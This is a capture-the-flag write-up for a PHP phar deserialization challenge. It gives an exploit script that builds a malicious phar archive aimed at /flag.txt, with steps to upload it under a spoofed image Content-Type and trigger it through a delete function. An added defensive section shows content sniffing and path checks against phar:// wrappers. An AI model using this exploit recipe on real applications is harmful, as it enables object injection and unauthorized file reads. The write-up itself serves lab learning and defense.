Steps:
1. Run this:
<?php
class User {
    public $db;
}
class File {
    public $filename;
}
class FileList {
    private $files;
    public function __construct() {
        $file = new File();
        $file->filename = "/flag.txt";
        $this->files = array($file);
    }
}
$a = new User();
$a->db = new FileList();
$phar = new Phar("phar.phar"); // the file extension must be .phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); // set the stub
$o = new User();
$o->db = new FileList();
$phar->setMetadata($a); // store the custom metadata in the manifest
$phar->addFromString("exp.txt", "test"); // add a file to the archive
// the signature is computed automatically
$phar->stopBuffering();
?>
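This generates a file named phar.phar.
Note: phar.readonly = Off must be set. PS: At first I used PHP 7 and could not generate the file; after switching to PHP 5 it worked.
2. Change the Content-Type to image/png, then upload the file.
3. Read the phar in delete to get the flag.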
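Steps 2 and 3 work because the upload check trusts the client's Content-Type and the delete code passes a user-controlled path to a file function. The following is an added defensive example, not code from the challenge or the original write-up; the function names upload_looks_safe and safe_target are hypothetical, the sample bytes are constructed, and the fileinfo extension is assumed to be loaded.

```php
<?php
// Added example. Function names are hypothetical; sample inputs are constructed.

/** Decide from the bytes, not the client's Content-Type, whether an upload is acceptable. */
function upload_looks_safe(string $bytes): bool
{
    // The Content-Type header is attacker-controlled, so sniff the type from the content.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if (!in_array($finfo->buffer($bytes), ['image/png', 'image/jpeg', 'image/gif'], true)) {
        return false;
    }
    // A phar-format archive carries this stub terminator, even behind an image header.
    // Heuristic only: tar- and zip-based phars do not need a stub.
    return stripos($bytes, '__HALT_COMPILER();') === false;
}

/** Map a user-supplied name to a real path inside $baseDir, or null if it is not acceptable. */
function safe_target(string $baseDir, string $name): ?string
{
    // Refuse stream wrappers (phar://, php://, ...) and anything that is not a bare file name.
    if (strpos($name, '://') !== false || $name !== basename($name)) {
        return null;
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $real === false) {
        return null;
    }
    // The resolved path must still be inside the upload directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// Constructed sample: PNG signature and IHDR start, alone and followed by a phar stub.
$png = "\x89PNG\r\n\x1a\n\x00\x00\x00\x0dIHDR" . pack('NN', 1, 1) . "\x08\x02\x00\x00\x00";
var_dump(upload_looks_safe($png . str_repeat("\x00", 4)));
var_dump(upload_looks_safe($png . '<?php __HALT_COMPILER(); ?>'));
var_dump(upload_looks_safe('<?php __HALT_COMPILER(); ?>'));
var_dump(safe_target(sys_get_temp_dir(), 'phar://x.png'));
```

The path check is the stronger control, because it keeps phar:// out of file functions no matter what was uploaded. PHP 8.0 and later also no longer unserialize phar metadata automatically when an archive is opened through a file function.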
References:
https://blog.csdn.net/weixin_44077544/article/details/102844554